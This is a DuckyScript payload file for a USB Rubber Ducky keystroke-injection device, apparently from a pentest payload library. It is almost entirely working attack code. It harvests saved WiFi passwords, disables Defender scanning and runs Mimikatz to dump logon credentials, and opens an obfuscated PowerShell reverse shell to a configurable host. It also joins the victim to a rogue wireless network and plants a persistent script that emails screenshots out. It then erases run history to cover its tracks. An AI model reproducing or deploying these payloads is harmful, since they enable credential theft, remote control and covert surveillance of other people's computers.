Path: blob/master/payloads/library/general/duckin8or/payload.txt
REM #############################################################################1REM # DuckyScript 3.0 #2REM # Title: _ _ _ _ #3REM # duckin8or >(.)__ >(.)__ >(.)__ >(.)__ #4REM # (___/ (___/ (___/ (___/ #5REM # Author: _ _ _ _ #6REM # irrrwin __(.)< __(.)< __(.)< __(.)< #7REM # \___) \___) \___) \___) #8REM # Compatibility: #9REM # Windows #10REM # #11REM # Description: #12REM # Choose one from 3 attack vectors: (s)creen, (u)ser or (n)etwork and #13REM # run a (v)anilla or (h)ardcore version of it with a button press. #14REM # Vanilla attacks are not intrusive and only grab data. Hardcore stuff #15REM # may interfere with the system and change its state to insecure. #16REM # In addition, Help pop-up and ATTACKMODE STORAGE are available. #17REM # #18REM # Usage: #19REM # 0. Insert Rubbing Duck. #20REM # 1. Choose payload by using a combination of |C|aps Lock, |N|um Lock #21REM # and |S|croll Lock as 0(OFF)/1(ON) switches. #22REM # 2. Press button to run the chosen payload. #23REM # 3. After successful execution, lock keys will start blinking. #24REM # 4. Press button again to reset lock keys and go back to menu. #25REM # 5. Enjoy. #26REM # #27REM # Payloads: #28REM # 0) |-|-|-| [HELP] Help. #29REM # 1) |-|-|S| [s][v] Proof of Pwnage pop-up and screenshot grab. #30REM # 2) |-|N|-| [n][v] Network info exfiltration. #31REM # 3) |-|N|S| [u][h] Disable AV and fetch credentials with Mimikatz. #32REM # 4) |C|-|-| [u][v] Open reverse shell with Powershell. #33REM # 5) |C|-|S| [n][h] Connect target to the rogue piƱa network. #34REM # 6) |C|N|-| [s][h] Persistent screenshot exfiltration. #35REM # 7) |C|N|S| [STOR] Storage mode. #36REM # #37REM # Help: #38REM # 0. Insert duckin8or. #39REM # 1. Press the button. #40REM # 2. Pop-up with brief payloads descriptions will appear. #41REM # #42REM # Tips: #43REM # * Start by filling out the >>> SETTINGS >>>>>> part. #44REM # * First letters of the Lock Keys make it easier to remember payloads. #45REM # F.e. 
to use (s)creen attack in vanilla mode press (S)croll Lock #46REM # only. To use it in hardcore mode, press the other two Lock Keys #47REM # instead. The same logic applies for (n)etwork attack and (N)um #48REM # Lock Key. For the (u)ser attacks, the (C)aps Lock is used. #49REM # * Each payload within the appropriate >> block << may be edited #50REM # or removed without breaking other features. #51REM # * Any serious application requires a properly obfuscated mimikatz bin.#52REM # * Be responsible. #53REM # #54REM # Kudos: #55REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #56REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #57REM # * the-jcksn - "ducky_crab" #58REM # * I am Jakoby - "-RD-PineApple" #59REM # * Hak5 Team #60REM # #61REM # Disclaimer: #62REM # *This program is free software: you can redistribute it and/or modify #63REM # it under the terms of the GNU General Public License as published by #64REM # the Free Software Foundation, either version 3 of the License, or (at #65REM # your option) any later version.* #66REM # #67REM # *You should have received a copy of the GNU General Public License #68REM # along with this program. 
If not, see http://www.gnu.org/licenses/ * #69REM # #70REM #############################################################################71727374REM >>> SETTINGS >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>75REM ~~~~~~~~~~~~ EDIT BELOW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~7677DEFINE VID VID_D34D78DEFINE PID PID_B33F79DEFINE MAN MAN_Pentest80DEFINE PROD PROD_DUCKY81DEFINE SERIAL SERIAL_300620498283DEFINE CLEANUP FALSE8485DEFINE LHOST 8.8.8.886DEFINE LPORT 6987DEFINE BEACON icanhazip.com8889DEFINE OUTLOOK_USER [email protected]90DEFINE OUTLOOK_PASS Password1!9192DEFINE CRAB_DELAY_SEC 6093DEFINE CRAB_DURATION_MIN 109495DEFINE PINEAPPLE_SSID PineApple9697REM ~~~~~~~~~~~~ EDIT ABOVE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~98REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETTINGS <<<99100101REM >>> SETUP >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>102103EXTENSION PASSIVE_WINDOWS_DETECT104REM VERSION 1.0105REM CONFIGURATION:106DEFINE MAX_WAIT 150107DEFINE CHECK_INTERVAL 20108DEFINE WINDOWS_HOST_REQUEST_COUNT 2109DEFINE NOT_WINDOWS 7110111VAR $MAX_TRIES = MAX_WAIT112WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))113DELAY CHECK_INTERVAL114$MAX_TRIES = ($MAX_TRIES - 1)115END_WHILE116IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN117$_OS = WINDOWS118ELSE119$_OS = NOT_WINDOWS120END_IF121END_EXTENSION122123IF ($_OS == NOT_WINDOWS) THEN124ATTACKMODE STORAGE125WAIT_FOR_BUTTON_PRESS126STOP_PAYLOAD127END_IF128129BUTTON_DEF130DELAY 20131END_BUTTON132133ATTACKMODE HID134DELAY 1000135136FUNCTION RESET_LOCKS()137REM Set all Lock Keys to OFF position.138IF ($_CAPSLOCK_ON == TRUE ) THEN139CAPSLOCK140END_IF141IF ($_SCROLLLOCK_ON == TRUE ) THEN142SCROLLLOCK143END_IF144IF ($_NUMLOCK_ON == TRUE ) THEN145NUMLOCK146END_IF147END_FUNCTION148149RESET_LOCKS()150151REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETUP <<<152153154REM >>> 
PAYLOAD 0 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>155REM | Open pop-up window with the Lock Keys combos cheatsheet.156157FUNCTION PAYLOAD0()158DELAY 500159GUI r160DELAY 500161STRINGLN powershell162DELAY 500163STRING $l = (164STRING 'Choose payload -> Press one -> Press two -> Repeat',165STRING 'P0 [-][-][-] : This window.',166STRING 'P1 [-][-][N] : Network info.',167STRING 'P2 [-][S][-] : Proof of Pwnage.',168STRING 'P3 [-][S][N] : User credentials.',169STRING 'P4 [C][-][-] : Reverse shell.',170STRING 'P5 [C][-][N] : Ducky_crab.',171STRING 'P6 [C][S][-] : Connect2pinapple.',172STRING 'P7 [C][S][N] : Storage.')173ENTER174STRINGLN $l = $l -join "`n- "175STRINGLN powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $l','~~~ duckin8or cheatsheet ~~~')}"176END_FUNCTION177178REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 0 <<<179180181REM >>> PAYLOAD 1 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>182REM | Open a proof of pwnage warning box and capture the screen. 
Save loot to REM | the SD card's root directyory183184FUNCTION PAYLOAD1()185ATTACKMODE HID STORAGE186DELAY 5000187188GUI r189DELAY 500190STRINGLN powershell -NoP -NonI -w h191DELAY 500192193STRINGLN powershell.exe -enc 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;exit194DELAY 500195196GUI r197DELAY 500198STRINGLN powershell -NoP -NonI -w h199DELAY 500200201STRINGLN powershell.exe -enc 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;exit202DELAY 2000203WAIT_FOR_STORAGE_INACTIVITY204END_FUNCTION205206REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 1 <<<207208209REM >>> PAYLOAD 2 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>210REM | Exfiltrate network data such as public IP, local IP and WiFi credentials.211REM | Save loot to the SD card's root directyory212213FUNCTION PAYLOAD2()214ATTACKMODE HID STORAGE215DELAY 5000216217GUI r218DELAY 500219STRINGLN Powershell220DELAY 500221222STRINGLN $pubIP=(Invoke-WebRequest icanhazip.com -UseBasicParsing).Content223STRINGLN $networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}224STRINGLN $WiFi = Out-String -InputObject ((netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | % {[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize) -Width 100225DELAY 100226STRINGLN $RD=((gwmi win32_volume -f 'label=''DUCKY''').Name + 'network.txt')227DELAY 100228STRINGLN ($WiFi + $pubIP + $networks.ipaddress[0]) | Set-Content -Path $RD229DELAY 200230STRINGLN exit231END_FUNCTION232233REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 2 <<<234235236REM >>> PAYLOAD 3 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>237REM | REQUIRES ADMIN PRIVILEGES. 
Exfiltrate users credentials with Mimikatz.238REM | Beware that Ducky will expose the drive and AV might pick up on any239REM | potential threats. Save loot to the SD card's root directyory240241FUNCTION PAYLOAD3()242ATTACKMODE HID STORAGE243DELAY 5000244245GUI r246DELAY 500247STRING powershell248DELAY 500249CTRL-SHIFT ENTER250DELAY 500251LEFT252ENTER253DELAY 500254255STRINGLN $RD = (gwmi win32_volume -f 'label=''DUCKY''').Name256DELAY 100257STRINGLN Import-Module Defender258DELAY 200259STRINGLN Set-MpPreference -ExclusionPath $RD260DELAY 100261STRINGLN cd $RD262DELAY 100263STRINGLN .\mk.exe > $env:UserName`.txt -and type $env:UserName`.txt264DELAY 1500265STRINGLN privilege::debug266DELAY 200267STRINGLN sekurlsa::logonPasswords full268DELAY 666269STRINGLN exit270DELAY 100271STRINGLN Remove-MpPreference -ExclusionPath $RD272DELAY 100273STRINGLN exit274END_FUNCTION275276REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 3 <<<277278279REM >>> PAYLOAD 4 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>280REM | Open a simple TCP reverse shell through a powershell session.281282FUNCTION PAYLOAD4()283DELAY 500284GUI r285DELAY 500286STRINGLN powershell -NoP -NonI -w h287DELAY 500288289STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("290STRING LHOST291STRING ",292STRING LPORT293STRING );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit294ENTER295END_FUNCTION296297REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 4 <<<298299300REM >>> PAYLOAD 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>301REM | Prepare an XML file with rogue Pineapple credentials and connect to it.302303FUNCTION PAYLOAD5()304DELAY 500305GUI r306DELAY 500307STRINGLN 
powershell308DELAY 500309310STRING $f="Home.xml";311STRING $SSID="312STRING PINEAPPLE_SSID313STRING ";314STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'';315STRING $xmlfile="<?xml version=""1.0""?><WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1""><name>$SSID</name><SSIDConfig><SSID><hex>$SSIDHEX</hex><name>$SSID</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><MSM><security><authEncryption><authentication>open</authentication><encryption>none</encryption><useOneX>false</useOneX></authEncryption></security></MSM></WLANProfile>";$XMLFILE > ($f);netsh wlan add profile filename="$($f)";netsh wlan connect name=$SSID;exit316ENTER317END_FUNCTION318319REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 5 <<<320321322REM >>> PAYLOAD 6 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>323REM | Gives "screen crab" like capabilities to the USB rubber ducky. 
Creates a324REM | powershell script that captures screenshots and exfiltrates them via outlook,325REM | even after the USB rubber ducky has been removed.326327FUNCTION PAYLOAD6()328DELAY 500329GUI r330DELAY 500331STRINGLN powershell332DELAY 200333STRINGLN Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser334DELAY 200335336STRINGLN New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file337DELAY 200338339STRINGLN "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append340DELAY 200341342STRING "`$t = new-timespan -Minutes343STRING CRAB_DURATION_MIN344STRING " | Out-File Pictures\screens.ps1 -Append345ENTER346DELAY 200347348STRINGLN "`$clk = [diagnostics.stopwatch]::StartNew() `nwhile (`$clk.elapsed -lt `$t){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$S = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$S.Width `n`$Height = `$S.Height `n`$Left = `$S.Left `n`$Top = `$S.top `n`$bmp = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$g = [System.Drawing.Graphics]::FromImage(`$bmp) `n`$g.CopyFromScreen(`$Left, `$Top, 0, 0, `$bmp.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$fn = `$enddate + '.gif' `n`$bmp.Save('C:\Users\$env:Username\Pictures\Screens\' + `$fn) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append349DELAY 200350351STRING "Send-MailMessage -From352STRING OUTLOOK_USER353STRING -To354STRING OUTLOOK_USER355STRING -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$fn`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList356STRING OUTLOOK_USER357STRING , (ConvertTo-SecureString -String `"358STRING OUTLOOK_PASS359STRING `" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append360ENTER361DELAY 200362363STRING 
"start-sleep -seconds364STRING CRAB_DELAY_SEC365STRING `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nexit" | Out-File Pictures\screens.ps1 -Append366ENTER367DELAY 200368STRINGLN exit369DELAY 300370371REM Run the prepared script.372GUI r373DELAY 500374STRINGLN powershell -w h -File "%USERPROFILE%\Pictures\screens.ps1"375DELAY 1000376END_FUNCTION377378REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 6 <<<379380381REM >>> PAYLOAD 7 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>382REM | Storage mode. Press button to stop sharing.383384FUNCTION PAYLOAD7()385ATTACKMODE STORAGE386DELAY 5000387WAIT_FOR_BUTTON_PRESS388$_BUTTON_PUSH_RECEIVED = FALSE389END_FUNCTION390391REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 7 <<<392393394REM >>> MAIN >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>395REM | Constantly monitor Scroll Lock, Num Lock, and Caps Lock keys with a while396REM | loop and run appropriate payload when the button is pressed. All Lock keys397REM | will blink when finished. 
Press again to go back to menu.398399WHILE (TRUE)400IF ($_BUTTON_PUSH_RECEIVED == TRUE ) THEN401DELAY 100402$_BUTTON_PUSH_RECEIVED = FALSE403DISABLE_BUTTON404SAVE_ATTACKMODE405406IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN407RESET_LOCKS()408PAYLOAD0()409ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN410RESET_LOCKS()411PAYLOAD1()412ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN413RESET_LOCKS()414PAYLOAD2()415ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN416RESET_LOCKS()417PAYLOAD3()418ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN419RESET_LOCKS()420PAYLOAD4()421ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN422RESET_LOCKS()423PAYLOAD5()424ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN425RESET_LOCKS()426PAYLOAD6()427ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN428RESET_LOCKS()429PAYLOAD7()430END_IF431432RESTORE_ATTACKMODE433DELAY 1000434435IF (CLEANUP == TRUE) THEN436GUI r437DELAY 500438STRINGLN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"; Remove-Item (Get-PSreadlineOption).HistorySavePath439END_IF440441ENABLE_BUTTON442RESET_LOCKS()443$_BUTTON_PUSH_RECEIVED = FALSE444DELAY 100445WHILE ($_BUTTON_PUSH_RECEIVED == FALSE )446DELAY 100447CAPSLOCK448SCROLLLOCK449NUMLOCK450DELAY 100451CAPSLOCK452SCROLLLOCK453NUMLOCK454END_WHILE455$_BUTTON_PUSH_RECEIVED = FALSE456DELAY 100457RESET_LOCKS()458DELAY 100459END_IF460END_WHILE461462REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< MAIN <<<463464465